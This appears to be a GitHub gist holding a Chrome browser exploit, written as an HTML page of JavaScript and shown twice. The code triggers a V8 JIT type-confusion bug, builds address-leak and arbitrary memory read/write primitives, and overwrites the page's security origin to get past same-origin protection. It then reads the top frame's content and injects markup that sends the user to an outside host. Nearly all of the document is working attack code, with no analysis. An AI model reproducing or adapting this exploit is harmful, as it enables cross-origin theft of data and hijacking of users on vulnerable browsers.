rootxharsh/chrome-spoof-origin-exploit.html Secret

## chrome-spoof-origin-exploit.html
<html>
    <b>pwn</b>

</html>
    <script>
/* Thanks to zer0pts ptr-yudai Discord log which helped me write this exploit :)  */
 var conversion_buffer = new ArrayBuffer(8);
 var float_view = new Float64Array(conversion_buffer);
 var int_view = new BigUint64Array(conversion_buffer);
 BigInt.prototype.hex = function() {
     return '0x' + this.toString(16);
 };
 BigInt.prototype.i2f = function() {
     int_view[0] = this;
     return float_view[0];
 }
 Number.prototype.f2i = function() {
     float_view[0] = this;
     return int_view[0];
 }
 function gc() {
     for (var i = 0; i < 0x10000; ++i)
         var a = new ArrayBuffer();
 }

 function pwn()
 {
     class LeakArrayBuffer extends ArrayBuffer {
         constructor(size) {
             super(size);
             this.slot = 0xb33f;
         }
     }

     function jitme(a) {
         var x = -1;
         if (a) x = 0xFFFFFFFF;
         var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
         arr.shift();
         var local_arr = Array(2);
         local_arr[0] = 5.1;
         var buff = new LeakArrayBuffer(0x1000);
         arr[0] = 0x1122;
         return [arr, local_arr, buff];
     }

     /* Cause bug */
     gc();
     console.log("[+] START");
     console.log("[+] window.origin now " + window.origin);
     for (var i = 0; i < 0x10000; ++i)
         jitme(false);
     gc();
     [corrput_arr, rwarr, corrupt_buff] = jitme(true);
     corrput_arr[12] = 0x22444;
     delete corrput_arr;


     /* Primitives */
     function set_backing_store(l, h) {
         rwarr[4] = ((h << 32n) | (rwarr[4].f2i() & 0xffffffffn)).i2f();
         rwarr[5] = ((rwarr[5].f2i() & 0xffffffff00000000n) | l).i2f();
     }
     function addrof(o) {
         corrupt_buff.slot = o;
         return (rwarr[9].f2i() - 1n) & 0xffffffffn;
     }


     var corrupt_view = new DataView(corrupt_buff);
     var corrupt_buffer_ptr_low = addrof(corrupt_buff);
     console.log("[+] leak = " + corrupt_buffer_ptr_low.hex());


     /* Fake obj */
     var idx0Addr = corrupt_buffer_ptr_low - 0x10n;
     var baseAddr = (corrupt_buffer_ptr_low & 0xffff0000n) - ((corrupt_buffer_ptr_low & 0xffff0000n) % 0x40000n) + 0x40000n;
     var delta = baseAddr + 0x1cn - idx0Addr;
     var addr_upper;
     if ((delta % 8n) == 0n) {
         var baseIdx = delta / 8n;
         addr_upper = (rwarr[baseIdx].f2i() & 0xffffffffn) << 32n;
     } else {
         var baseIdx = ((delta - (delta % 8n)) / 8n);
         addr_upper = rwarr[baseIdx].f2i() & 0xffffffff00000000n;
     }
     console.log("[+] upper = " + addr_upper.hex());

     function aar64(addr) {
         set_backing_store(addr >> 32n, addr & 0xffffffffn);
         return corrupt_view.getFloat64(0, true).f2i();
     }
     function aaw64(addr, value) {
         set_backing_store(addr >> 32n, addr & 0xffffffffn);
         corrupt_view.setFloat64(0, value.i2f(), true);
     }
     function aaw32(addr, value) {
         set_backing_store(addr >> 32n, addr & 0xffffffffn);
         corrupt_view.setInt32(0, value, true);
     }
     function aaw8(addr, value) {
         set_backing_store(addr >> 32n, addr & 0xffffffffn);
         corrupt_view.setInt8(0, value , true);
     }

    var addr_window = addr_upper | addrof(window) + 0x18n;
    console.log("[+] window = " + addr_window.hex());

    var addr_ldomwin = aar64(addr_window) + 0x80n;
    console.log("[+] LoclDOMWindow = " + addr_ldomwin.hex());

    var get_sec_origin = aar64(addr_ldomwin + 0x110n);
    console.log("[+] sec_origin_context " + get_sec_origin.hex());
    var addr_sec = aar64(get_sec_origin + 0x110n + 0x10n);
    console.log("[+] security_context = " + addr_sec.hex())

    //var port = aar64(addr_sec+0x20n); // you can spoof the port which is at +0x20 from sec
   //console.log("[+] port  = " + port.hex())

     var sec_host = aar64(addr_sec+0x18n);
     console.log("[+] host String = "  + sec_host.hex())
     aaw32(sec_host, 0x656d6f73) //p32(0x656d6f73) = some

    console.log("[+] window.origin after exp = "+window.origin)
    try{
    console.log("[+] Accessing top.document.body.innerHTML ")
    console.log(top.document.body.innerHTML);
    top.document.body.innerHTML = '<img src=x onerror="location=`http://mws.rce.ee/`">'
    }
    catch(e){
    console.log("sed lyf")
    }
 }

 pwn()

</script>
	<html>
	<b>pwn</b>

	</html>
	<script>
	/* Thanks to zer0pts ptr-yudai Discord log which helped me write this exploit :) */
	var conversion_buffer = new ArrayBuffer(8);
	var float_view = new Float64Array(conversion_buffer);
	var int_view = new BigUint64Array(conversion_buffer);
	BigInt.prototype.hex = function() {
	return '0x' + this.toString(16);
	};
	BigInt.prototype.i2f = function() {
	int_view[0] = this;
	return float_view[0];
	}
	Number.prototype.f2i = function() {
	float_view[0] = this;
	return int_view[0];
	}
	function gc() {
	for (var i = 0; i < 0x10000; ++i)
	var a = new ArrayBuffer();
	}

	function pwn()
	{
	class LeakArrayBuffer extends ArrayBuffer {
	constructor(size) {
	super(size);
	this.slot = 0xb33f;
	}
	}

	function jitme(a) {
	var x = -1;
	if (a) x = 0xFFFFFFFF;
	var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
	arr.shift();
	var local_arr = Array(2);
	local_arr[0] = 5.1;
	var buff = new LeakArrayBuffer(0x1000);
	arr[0] = 0x1122;
	return [arr, local_arr, buff];
	}

	/* Cause bug */
	gc();
	console.log("[+] START");
	console.log("[+] window.origin now " + window.origin);
	for (var i = 0; i < 0x10000; ++i)
	jitme(false);
	gc();
	[corrput_arr, rwarr, corrupt_buff] = jitme(true);
	corrput_arr[12] = 0x22444;
	delete corrput_arr;



	/* Primitives */
	function set_backing_store(l, h) {
	rwarr[4] = ((h << 32n) \| (rwarr[4].f2i() & 0xffffffffn)).i2f();
	rwarr[5] = ((rwarr[5].f2i() & 0xffffffff00000000n) \| l).i2f();
	}
	function addrof(o) {
	corrupt_buff.slot = o;
	return (rwarr[9].f2i() - 1n) & 0xffffffffn;
	}



	var corrupt_view = new DataView(corrupt_buff);
	var corrupt_buffer_ptr_low = addrof(corrupt_buff);
	console.log("[+] leak = " + corrupt_buffer_ptr_low.hex());



	/* Fake obj */
	var idx0Addr = corrupt_buffer_ptr_low - 0x10n;
	var baseAddr = (corrupt_buffer_ptr_low & 0xffff0000n) - ((corrupt_buffer_ptr_low & 0xffff0000n) % 0x40000n) + 0x40000n;
	var delta = baseAddr + 0x1cn - idx0Addr;
	var addr_upper;
	if ((delta % 8n) == 0n) {
	var baseIdx = delta / 8n;
	addr_upper = (rwarr[baseIdx].f2i() & 0xffffffffn) << 32n;
	} else {
	var baseIdx = ((delta - (delta % 8n)) / 8n);
	addr_upper = rwarr[baseIdx].f2i() & 0xffffffff00000000n;
	}
	console.log("[+] upper = " + addr_upper.hex());

	function aar64(addr) {
	set_backing_store(addr >> 32n, addr & 0xffffffffn);
	return corrupt_view.getFloat64(0, true).f2i();
	}
	function aaw64(addr, value) {
	set_backing_store(addr >> 32n, addr & 0xffffffffn);
	corrupt_view.setFloat64(0, value.i2f(), true);
	}
	function aaw32(addr, value) {
	set_backing_store(addr >> 32n, addr & 0xffffffffn);
	corrupt_view.setInt32(0, value, true);
	}
	function aaw8(addr, value) {
	set_backing_store(addr >> 32n, addr & 0xffffffffn);
	corrupt_view.setInt8(0, value , true);
	}

	var addr_window = addr_upper \| addrof(window) + 0x18n;
	console.log("[+] window = " + addr_window.hex());

	var addr_ldomwin = aar64(addr_window) + 0x80n;
	console.log("[+] LoclDOMWindow = " + addr_ldomwin.hex());

	var get_sec_origin = aar64(addr_ldomwin + 0x110n);
	console.log("[+] sec_origin_context " + get_sec_origin.hex());
	var addr_sec = aar64(get_sec_origin + 0x110n + 0x10n);
	console.log("[+] security_context = " + addr_sec.hex())

	//var port = aar64(addr_sec+0x20n); // you can spoof the port which is at +0x20 from sec
	//console.log("[+] port = " + port.hex())

	var sec_host = aar64(addr_sec+0x18n);
	console.log("[+] host String = " + sec_host.hex())
	aaw32(sec_host, 0x656d6f73) //p32(0x656d6f73) = some

	console.log("[+] window.origin after exp = "+window.origin)
	try{
	console.log("[+] Accessing top.document.body.innerHTML ")
	console.log(top.document.body.innerHTML);
	top.document.body.innerHTML = '<img src=x onerror="location=`http://mws.rce.ee/`">'
	}
	catch(e){
	console.log("sed lyf")
	}
	}

	pwn()

	</script>